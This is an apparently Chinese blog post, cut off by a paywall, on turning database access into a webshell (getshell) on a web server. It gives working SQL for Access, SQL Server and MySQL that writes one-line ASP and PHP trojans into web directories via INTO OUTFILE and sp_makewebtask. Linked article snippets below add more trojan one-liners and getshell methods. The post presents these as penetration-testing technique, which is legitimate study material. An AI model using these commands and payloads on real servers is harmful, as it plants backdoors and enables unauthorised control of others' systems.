数据库命令执行Getshell

最新推荐文章于 2026-05-02 09:50:09 发布

原创

最新推荐文章于 2026-05-02 09:50:09 发布 · 1.1k 阅读

标签

#渗透测试

收录于

本文介绍了通过Access、Sqlserver和Mysql数据库导出文件的方法，并结合渗透测试中的Getshell技巧，包括不同方式获取Webshell，如利用phpMyAdmin、load_file函数、general_log_file等，以及如何在权限限制下绕过杀毒软件实现Webshell的植入。

开发板推荐：天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

点击查看

Access导出

Access可导出xxx等文件需要配合解析漏洞

create table cmd (a varchar(50));
insert into cmd (a) values ('一句话木马')   #一句话木马如：<%execute request(1)%>
select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd 
drop table cmd

菜刀直连https://www.xxx.com/1.asa;x.xls

Sqlserver导出

exec sp_makewebtask 'C:\test1.php','select "<%eval request("pass")%>" '--

Mysql导出

以phpMyAdmin为例

方式一

create TABLE xiaoma (xiaoma1 text NOT NULL);
insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma]);?>');
select xiaoma1 from xiaoma into outfile 'D:/phpstudy/www/7.php';
drop TABLE IF EXISTS xiaoma;

方法二

select "<?php eval($_POST[v01cano]);?>" into outfile 'D:/phpstudy/www/a.php'

方式三

当数据库路径未知时Getshell

//创建表a,并且将httpd.conf

开发板推荐：天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

点击查看

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

amd6700k

关注关注

0
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

达梦数据库写文件的方式探索

C20220511的博客

05-30

1634

DMSQL默认情况下是支持堆叠注入的（笔者试了官方给的java版本的SDK，其它版本未尝试），也就是说在注入的时候支持多语句，支持多语句为攻击者提供了对SQL注入漏洞进行深入利用的遐想，也使得本文利用DMSQL写文件的研究具有实际意义。通过SQL注入来写文件一直以来都是SQL注入漏洞深入利用的一种方式，对于不同的数据库通常写文件的方式也是不一样的。通过自定义命名空间的方式来写文件可以实现完全自主可控的文件名和文件内容，对用户权限要求也不是很高，但是缺点是文件太大（我默认安装的DM，最小的文件是32M）。

参与评论您还未登录，请先登录后发表或查看评论

从弱口令到RDP：一次Oracle数据库getshell的完整实战复盘（含SID查询与工具使用）

最新发布

weixin_28741413的博客

05-02

223

本文详细记录了从Oracle数据库弱口令漏洞到最终getshell的完整渗透测试过程。通过SQL注入、命令执行等技术手段，攻击者成功突破系统边界并获取管理员权限，揭示了老旧Oracle系统在版本限制下的安全风险。文章包含SID查询、工具使用等实战细节，并提供了针对性的防御建议。

使用shell脚本执行达梦数据库sql脚本文件

qq_38428100的博客

01-11

1万+

使用shell脚本执行达梦数据库sql脚本文件最近遇到一个问题，需要给现场实施人员准备数据库执行脚本，但需要进行隔离操作，避免现场人员误操作修改了sql，导致出现其他问题。达梦数据库在网上的资料真是少之又少，但是发现大多数达梦语法描述为同oracle，嗯？？…… 方式一当然是windows电脑安装达梦管理工具，直接把脚本贴进去执行，但避免不了出现误操作方式二使用shell脚本执行sql 1. 先找到达梦数据库安装位置吧 [root@localhost ~]# ss -nlp |grep 5236

文件上传一句话木马getshell

qq_41620273的博客

12-25

6160

文件上传文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件一句话木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru()：只调用命令，把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add

Mysql数据库getshell方法

weixin_68408599的博客

04-02

2747

今天摸鱼时候，突然有人问我不同的数据库getshell的方式，一时间我想到了mysql还有redis未授权访问到getshell的方式，但是仅仅第一时间只想到了这两种，我有查了查资料，找到了上面两种数据库getshell的补充，以及其他数据库getshell的方式。因此更新一个专栏，各个数据库getshell的方式。

MySQL写Shell方法总结

李同學AI安全

12-31

5244

MySQL注入点，用工具对目标站点写入一句话shell,需要哪些前提条件？ **root权限以及网站的绝对路径** outfile 和 dumpfile 写Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态；(魔术引号，GET、POST、COOKIE) `写入的那个路径要有写入权限过滤了单引号into outfile 还可以用吗不能,GPC要OFF才行，可以测试Hex编码基于UNION联合查询 ?id=1 UNION ALL SELECT

网站渗透总结之Getshell用法大全

LinkSLA的博客

11-07

3876

后台数据库备份getshell，上传图片马并获取图片马路径，通过数据库备份修改后缀名，如有后缀名无法修改或路径无法修改限制可修改前端代码绕过，当所备份的数据库来源无法修改时，我们可以通过首先将一句话木马写入数据库

网站后台getshell的方法总结

L_lemo004的博客

07-12

6234

方法一：直接上传getshell 以dedecms为例，后台可以直接上传脚本文件，从而getshell，具体方法如下：即可成功上传大马，并成功执行，从而拿下webshell。坑：通常由于权限限制，导致只有该目录权限，无法进入其他目录，此时便可以采用…/跳转到根目录，或者其他目录，此时所采用的方法是如下的文件改名方法二：数据库备份getshell 以南方数据cms为例： 1，首先上传一张图片马...

Getshell思路总结

goddemon

01-20

4286

getshell的常见方法总结后台getshell 1.)上传getshell ①基础的文件上传类方式进行getshell upload专题中间建类总结 ②数据库备份getshell #直接数据库备份getshell ①上传图片马并获得图片马路径 ②通过数据库备份修改后缀名(修改为允许的后缀名代getshell) #绕方法getshell #如果名字不可以修改 ①将一句话木马插入到数据库中-->比如通过新建管理员用户，将用户名用一句话木马代替（用户名通常有长度限制，在前端修改maxlength即可

利用postgresql getshell

lansefly1990的专栏

11-07

3999

原文地址：http://www.jianfensec.com/postgresql_getshell.html 0x00 前言研究postgresql数据库如何getshell是在渗透中遇到一个pgAdmin的web管理页面可以直接操作postgresql且通过网上的文章没有达到9.6版本getshell的效果所以便有了以下文章。解决新版本写入函数so文件创建函数失败问题. 0x01 po...

mysql_getshell的几种方法

carmi的博客

09-12

2314

mysql_getshell 一、mysql的--os-shell 利用原理 --os-shell就是使用udf提权获取WebShell。也是通过into oufile向服务器写入两个文件，一个可以直接执行系统命令，一个进行上传文件。此为sqlmap的一个命令，利用这条命令的先决条件：要求为数据库DBA，使用--is-dba查看当前网站连接的数据库账号是否为mysql user表中的管理员...

Get Shell！ — 绕过防护上传木马

qq_52108058的博客

11-14

1296

web的含义显然是需要服务器开放web服务shell是一个人机交互页面拿shell的含义是取得对服务器/电脑某种程度上的操作权限webshell拿到网站服务器的权限(shell)木马可以帮助我们拿到shell，以达到控制网站服务器的目的，也有人称之为网站的后门工具。

SQL注入-getshell

热门推荐

LJH1999ZN的博客

02-15

1万+

一、getshell的含义 1.什么是shell？ Shell 是一个程序，提供一个用户与操作系统内核连接的环境。这个环境只有一个命令提示符，让用户从键盘输入命令，所以又称为命令行环境。 2.什么是webshell? WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执

【每天学一点新知识】getshell？？？webshell？？？

RexHa的博客

10-08

7857

getshell就是可以通过某种漏洞达到留下后门的操作，可以通过程序的bug进入后台。往往应用于上传一句话木马，然后利用菜刀、蚁剑等工具连接一句话在对方服务器的绝对路径，然后获得服务器的各个盘符的信息。

命令执行&文件上传

wtylcam的博客

11-03

1684

命令执行&文件上传

SQL注入Getshell的奇思妙想（上）

ALLEN'Blog

02-13

831

前段时间，hvv和找实习的师傅们也多了起来。而我也不例外，尝试投递了不少简历，结果是积累了大量的面试经验。笔者发现大量的hr面试官都喜欢从SQL注入开始询问，所以留心了一下关于SQL注入的问题的频率。结果非常amazing啊！不出意外的是–os-shell名列榜首。比如这道题我都遇见不下三次：SQL注入getshell的方式？答：getshell是指攻击者通过利用SQL注入获取系统权限的方法，Webshell提权分两种：一是利用outfile函数，另外一种是利用–os-shell；

第二十一天 getshell

weixin_46653764的博客

06-26

480

（1）直接上传拿shell 如果知道网站是用什么cms，但网站后台改了目录，很难去通过扫目录来获取后台地址，那这时就可以通过谷歌语法↓（这里拿织梦cms来做比喻–>织梦默认后台路径是/dede/login.php,通常者都会被管理员改掉的）可以这样：inurl:（你要查的url） intext:powered by dedecms（这是dedecms在后台管理登录界面的关键词，虽然这里没写全）知道后台地址后，就尝试弱口令爆破，爆不了只能想其他法子这里假设已经登进了后台，像织梦cms，进入了后

【网络安全---sql注入（2）】如何通过SQL注入getshell？如何通过SQL注入读取文件或者数据库数据？一篇文章告诉你过程和原理。

m0_67844671的博客

10-01

2675

【sql注入】如何通过SQL注入getshell？如何通过SQL注入读取文件或者数据库数据？一篇文章告诉你过程和原理。本篇博客主要是通过piakchu靶场来讲解如何通过SQL注入漏洞来写入文件，读取文件。通过SQL输入来注入木马来getshell等，讲解了比较详细的过程；

数据库权限提升GetShell

saber的博客

10-21

1433

各类常见数据库提权方式及提权资料文章

其他常见的getshell方式

LJH1999ZN的博客

03-31

4163

ASP常用的一句话木马： <%eval request(“hack")%> <%execute request(“hack")%> <%execute(request(“hack"))%> <%ExecuteGlobal request(“hack")%> 一、修改配置文件getshell HadSky5.5.2.20180525存在配置文件写入导致getshell 安装过程总共五个步骤来进行安装，每一步程序将会引用一些文件进行操作，但是由于inst